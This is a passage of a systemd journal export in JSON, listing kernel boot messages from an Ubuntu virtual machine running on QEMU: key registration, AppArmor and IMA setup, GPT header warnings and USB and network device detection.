"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18f;b=e2b08827b5804427b422c10c84f1567e;m=573429;t=5bd16dd1ab390;x=364a7ceb72127fa7", "__REALTIME_TIMESTAMP" : "1615280779998096", "__MONOTONIC_TIMESTAMP" : "5714985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1167803", "MESSAGE" : "Loaded X.509 cert 'Build time autogenerated kernel key: 9d88e3c0462fa0d2df2917e8bbfdfdd1c55d8ddc'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=190;b=e2b08827b5804427b422c10c84f1567e;m=573433;t=5bd16dd1ab39b;x=a7649390f19a2916", "__REALTIME_TIMESTAMP" : "1615280779998107", "__MONOTONIC_TIMESTAMP" : "5714995", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1171911", "MESSAGE" : "zswap: loaded using pool lzo/zbud" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=191;b=e2b08827b5804427b422c10c84f1567e;m=57343e;t=5bd16dd1ab3a6;x=14cb07770d36fce", "__REALTIME_TIMESTAMP" : "1615280779998118", "__MONOTONIC_TIMESTAMP" : "5715006", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1179054", "MESSAGE" : "Key type big_key registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=192;b=e2b08827b5804427b422c10c84f1567e;m=573449;t=5bd16dd1ab3b1;x=84725ba8ef890781", "__REALTIME_TIMESTAMP" : "1615280779998129", "__MONOTONIC_TIMESTAMP" : "5715017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1181159", "MESSAGE" : "Key type trusted registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=193;b=e2b08827b5804427b422c10c84f1567e;m=573457;t=5bd16dd1ab3be;x=8c35f3d6f37cf7a", "__REALTIME_TIMESTAMP" : "1615280779998142", "__MONOTONIC_TIMESTAMP" : "5715031", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1184702", "MESSAGE" : "Key type encrypted registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=194;b=e2b08827b5804427b422c10c84f1567e;m=573462;t=5bd16dd1ab3ca;x=c87a6c56a1a279ae", "__REALTIME_TIMESTAMP" : "1615280779998154", "__MONOTONIC_TIMESTAMP" : "5715042", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1186983", "MESSAGE" : "AppArmor: AppArmor sha1 policy hashing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=195;b=e2b08827b5804427b422c10c84f1567e;m=57346d;t=5bd16dd1ab3d5;x=c957789a9634f928", "__REALTIME_TIMESTAMP" : "1615280779998165", "__MONOTONIC_TIMESTAMP" : "5715053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1190009", "MESSAGE" : "ima: No TPM chip found, activating TPM-bypass! (rc=-19)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=196;b=e2b08827b5804427b422c10c84f1567e;m=573478;t=5bd16dd1ab3e0;x=adfc620004c800d3", "__REALTIME_TIMESTAMP" : "1615280779998176", "__MONOTONIC_TIMESTAMP" : "5715064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1193151", "MESSAGE" : "ima: Allocated hash algorithm: sha1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=197;b=e2b08827b5804427b422c10c84f1567e;m=573483;t=5bd16dd1ab3eb;x=693f53aec40a6152", "__REALTIME_TIMESTAMP" : "1615280779998187", "__MONOTONIC_TIMESTAMP" : "5715075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1195370", "MESSAGE" : "evm: HMAC attrs: 0x1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=198;b=e2b08827b5804427b422c10c84f1567e;m=57348e;t=5bd16dd1ab3f6;x=ab505d66e5946eb3", "__REALTIME_TIMESTAMP" : "1615280779998198", "__MONOTONIC_TIMESTAMP" : "5715086", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1212166", "MESSAGE" : " Magic number: 13:673:120" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=199;b=e2b08827b5804427b422c10c84f1567e;m=573546;t=5bd16dd1ab4ae;x=33380f962a41035e", "__REALTIME_TIMESTAMP" : "1615280779998382", "__MONOTONIC_TIMESTAMP" : "5715270", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "misc", "_KERNEL_DEVICE" : "c10:236", "_UDEV_DEVNODE" : "/dev/mapper/control", "_UDEV_SYSNAME" : "device-mapper", "_SOURCE_MONOTONIC_TIMESTAMP" : "1214311", "MESSAGE" : "misc device-mapper: hash matches" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19a;b=e2b08827b5804427b422c10c84f1567e;m=5735e0;t=5bd16dd1ab547;x=6ddee31668d859d8", "__REALTIME_TIMESTAMP" : "1615280779998535", "__MONOTONIC_TIMESTAMP" : "5715424", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1216895", "MESSAGE" : "rtc_cmos 00:00: setting system clock to 2021-03-09 09:06:15 UTC (1615280775)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19b;b=e2b08827b5804427b422c10c84f1567e;m=5735f4;t=5bd16dd1ab55c;x=4565413a50e75f50", "__REALTIME_TIMESTAMP" : "1615280779998556", "__MONOTONIC_TIMESTAMP" : "5715444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1221337", "MESSAGE" : "BIOS EDD facility v0.16 2004-Jun-25, 0 devices found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19c;b=e2b08827b5804427b422c10c84f1567e;m=573601;t=5bd16dd1ab569;x=f4f41e03b396a3ad", "__REALTIME_TIMESTAMP" : "1615280779998569", "__MONOTONIC_TIMESTAMP" : "5715457", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1224355", "MESSAGE" : "EDD information not available." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19d;b=e2b08827b5804427b422c10c84f1567e;m=57360e;t=5bd16dd1ab575;x=329d3d8c40cf755c", "__REALTIME_TIMESTAMP" : "1615280779998581", "__MONOTONIC_TIMESTAMP" : "5715470", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1229389", "MESSAGE" : "Freeing unused kernel image memory: 2436K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19e;b=e2b08827b5804427b422c10c84f1567e;m=57361a;t=5bd16dd1ab581;x=e986ddf95cc1e0d4", "__REALTIME_TIMESTAMP" : "1615280779998593", "__MONOTONIC_TIMESTAMP" : "5715482", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1236019", "MESSAGE" : "Write protecting the kernel read-only data: 20480k" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19f;b=e2b08827b5804427b422c10c84f1567e;m=573628;t=5bd16dd1ab58f;x=a7162108f59cf17e", "__REALTIME_TIMESTAMP" : "1615280779998607", "__MONOTONIC_TIMESTAMP" : "5715496", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1240612", "MESSAGE" : "Freeing unused kernel image memory: 2008K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a0;b=e2b08827b5804427b422c10c84f1567e;m=57363e;t=5bd16dd1ab5a5;x=2e6670b63c08b1f0", "__REALTIME_TIMESTAMP" : "1615280779998629", "__MONOTONIC_TIMESTAMP" : "5715518", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1243751", "MESSAGE" : "Freeing unused kernel image memory: 1972K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a1;b=e2b08827b5804427b422c10c84f1567e;m=573652;t=5bd16dd1ab5ba;x=dc19fed6f929eec8", "__REALTIME_TIMESTAMP" : "1615280779998650", "__MONOTONIC_TIMESTAMP" : "5715538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1254068", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a2;b=e2b08827b5804427b422c10c84f1567e;m=57366f;t=5bd16dd1ab5d6;x=6c443cca0ce6637f", "__REALTIME_TIMESTAMP" : "1615280779998678", "__MONOTONIC_TIMESTAMP" : "5715567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1257536", "MESSAGE" : "x86/mm: Checking user space page tables" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a3;b=e2b08827b5804427b422c10c84f1567e;m=57368a;t=5bd16dd1ab5f1;x=a5a65394811d4696", "__REALTIME_TIMESTAMP" : "1615280779998705", "__MONOTONIC_TIMESTAMP" : "5715594", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found.", "_SOURCE_MONOTONIC_TIMESTAMP" : "1267705" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a4;b=e2b08827b5804427b422c10c84f1567e;m=573696;t=5bd16dd1ab5fd;x=b489bb420b8ec40e", "__REALTIME_TIMESTAMP" : "1615280779998717", "__MONOTONIC_TIMESTAMP" : "5715606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1405178", "MESSAGE" : "FDC 0 is a S82078B" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a5;b=e2b08827b5804427b422c10c84f1567e;m=5736a5;t=5bd16dd1ab60c;x=817de7ebebd1e132", "__REALTIME_TIMESTAMP" : "1615280779998732", "__MONOTONIC_TIMESTAMP" : "5715621", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1432467", "MESSAGE" : "GPT:Primary header thinks Alt. header is not at the end of the disk." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a6;b=e2b08827b5804427b422c10c84f1567e;m=5736b0;t=5bd16dd1ab618;x=4cac53a8770fc56d", "__REALTIME_TIMESTAMP" : "1615280779998744", "__MONOTONIC_TIMESTAMP" : "5715632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1436976", "MESSAGE" : "GPT:4612095 != 41943039" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a7;b=e2b08827b5804427b422c10c84f1567e;m=5736bc;t=5bd16dd1ab623;x=1f89e9c78d034e8f", "__REALTIME_TIMESTAMP" : "1615280779998755", "__MONOTONIC_TIMESTAMP" : "5715644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1438992", "MESSAGE" : "GPT:Alternate GPT header not at the end of the disk." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a8;b=e2b08827b5804427b422c10c84f1567e;m=5736c7;t=5bd16dd1ab62e;x=f98f5d259b2bc42", "__REALTIME_TIMESTAMP" : "1615280779998766", "__MONOTONIC_TIMESTAMP" : "5715655", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "MESSAGE" : "GPT:4612095 != 41943039", "_SOURCE_MONOTONIC_TIMESTAMP" : "1442022" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a9;b=e2b08827b5804427b422c10c84f1567e;m=5736d2;t=5bd16dd1ab63a;x=eec1178dae8a019d", "__REALTIME_TIMESTAMP" : "1615280779998778", "__MONOTONIC_TIMESTAMP" : "5715666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1443904", "MESSAGE" : "GPT: Use GNU Parted to correct GPT errors." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1aa;b=e2b08827b5804427b422c10c84f1567e;m=5736dd;t=5bd16dd1ab645;x=103e0e1edea30124", "__REALTIME_TIMESTAMP" : "1615280779998789", "__MONOTONIC_TIMESTAMP" : "5715677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1446596", "MESSAGE" : " vda: vda1 vda14 vda15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ab;b=e2b08827b5804427b422c10c84f1567e;m=5737aa;t=5bd16dd1ab712;x=5c729b3bea69173c", "__REALTIME_TIMESTAMP" : "1615280779998994", "__MONOTONIC_TIMESTAMP" : "5715882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-1", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1448430", "MESSAGE" : "usb 1-1: new full-speed USB device number 2 using uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ac;b=e2b08827b5804427b422c10c84f1567e;m=5737bc;t=5bd16dd1ab723;x=3f7f6606021883a3", "__REALTIME_TIMESTAMP" : "1615280779999011", "__MONOTONIC_TIMESTAMP" : "5715900", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1454205", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ad;b=e2b08827b5804427b422c10c84f1567e;m=5737c7;t=5bd16dd1ab72e;x=82b9b7cf8de193ea", "__REALTIME_TIMESTAMP" : "1615280779999022", "__MONOTONIC_TIMESTAMP" : "5715911", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1464412", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ae;b=e2b08827b5804427b422c10c84f1567e;m=5737d5;t=5bd16dd1ab73d;x=5c0c31abe2badf4e", "__REALTIME_TIMESTAMP" : "1615280779999037", "__MONOTONIC_TIMESTAMP" : "5715925", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1492169", "MESSAGE" : "AVX2 version of gcm_enc/dec engaged." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1af;b=e2b08827b5804427b422c10c84f1567e;m=5737e0;t=5bd16dd1ab748;x=940d0df36e6f4f07", "__REALTIME_TIMESTAMP" : "1615280779999048", "__MONOTONIC_TIMESTAMP" : "5715936", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1494593", "MESSAGE" : "AES CTR mode by8 optimization enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b0;b=e2b08827b5804427b422c10c84f1567e;m=573866;t=5bd16dd1ab7ce;x=49437386093b2439", "__REALTIME_TIMESTAMP" : "1615280779999182", "__MONOTONIC_TIMESTAMP" : "5716070", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "virtio", "_KERNEL_DEVICE" : "+virtio:virtio0", "_UDEV_SYSNAME" : "virtio0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1518610", "MESSAGE" : "virtio_net virtio0 ens3: renamed from eth0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b1;b=e2b08827b5804427b422c10c84f1567e;m=576eb1;t=5bd16dd1aee19;x=f8ac91959c4aa0c7", "__REALTIME_TIMESTAMP" : "1615280780013081", "__MONOTONIC_TIMESTAMP" : "5729969", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1637764", "MESSAGE" : "usb 1-1: New USB device found, idVendor=0627, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b2;b=e2b08827b5804427b422c10c84f1567e;m=576f8a;t=5bd16dd1aeef1;x=3dee08a725e18662", "__REALTIME_TIMESTAMP" : "1615280780013297", "__MONOTONIC_TIMESTAMP" : "5730186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1642734", "MESSAGE" : "usb 1-1: New USB device strings: Mfr=1, Product=3, SerialNumber=5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b3;b=e2b08827b5804427b422c10c84f1567e;m=577050;t=5bd16dd1aefb7;x=f535519e98e61b88", "__REALTIME_TIMESTAMP" : "1615280780013495", "__MONOTONIC_TIMESTAMP" : "5730384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1647407", "MESSAGE" : "usb 1-1: Product: QEMU USB Tablet" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b4;b=e2b08827b5804427b422c10c84f1567e;m=57712b;t=5bd16dd1af092;x=f90ca1ec6fed0efe", "__REALTIME_TIMESTAMP" : "1615280780013714", "__MONOTONIC_TIMESTAMP" : "5730603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1650426", "MESSAGE" : "usb 1-1: Manufacturer: QEMU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b5;b=e2b08827b5804427b422c10c84f1567e;m=5771cf;t=5bd16dd1af137;x=6effa3dd88249486", "__REALTIME_TIMESTAMP" : "1615280780013879", "__MONOTONIC_TIMESTAMP" : "5730767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", 